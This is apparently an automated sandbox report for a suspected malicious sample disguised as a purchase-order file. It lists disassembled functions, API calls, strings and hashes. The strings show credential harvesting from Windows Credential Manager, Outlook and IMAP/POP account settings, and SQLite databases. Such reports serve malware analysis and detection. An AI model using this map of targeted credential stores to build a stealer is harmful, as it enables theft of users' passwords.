                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy
                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                • API String ID: 714388716-318151290
                                                                                • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                APIs
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                • String ID:
                                                                                • API String ID: 1416211542-0
                                                                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 2360744853-2229823034
                                                                                • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                APIs
                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                • API String ID: 1831126014-3814494228
                                                                                • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                APIs
                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                • memset.MSVCRT ref: 00410129
                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                • memset.MSVCRT ref: 00410171
                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 912701516-1821301763
                                                                                • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 3540791495-3849865405
                                                                                • Opcode ID: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                                                • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                • Opcode Fuzzy Hash: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                                                • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                Strings
                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                • API String ID: 1640410171-2022683286
                                                                                • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                APIs
                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$strlen
                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                • API String ID: 2619041689-3408036318
                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$strlen
                                                                                • String ID:
                                                                                • API String ID: 667451143-3916222277
                                                                                • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                APIs
                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                • memset.MSVCRT ref: 0040882A
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID: J$Microsoft_WinInet
                                                                                • API String ID: 3318079752-260894208
                                                                                • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 2881943006-572158859
                                                                                • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                APIs
                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 888011440-2039793938
                                                                                • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                APIs
                                                                                Strings
                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                • out of memory, xrefs: 0042EBEF
                                                                                • database is already attached, xrefs: 0042EA97
                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                • API String ID: 1297977491-2001300268
                                                                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                APIs
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A3E
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A4C
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A5D
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A74
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A7D
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,75920A60,?,00000000), ref: 00409C53
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,75920A60,?,00000000), ref: 00409C6F
                                                                                • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,75920A60), ref: 00409C97
                                                                                • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,75920A60), ref: 00409CB4
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75920A60), ref: 00409D3D
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,75920A60), ref: 00409D47
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75920A60), ref: 00409D7F
                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                • String ID: 0wE$d
                                                                                • API String ID: 2915808112-1552800882
                                                                                • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                APIs
                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringstrchr
                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                • API String ID: 1348940319-1729847305
                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 00405E80
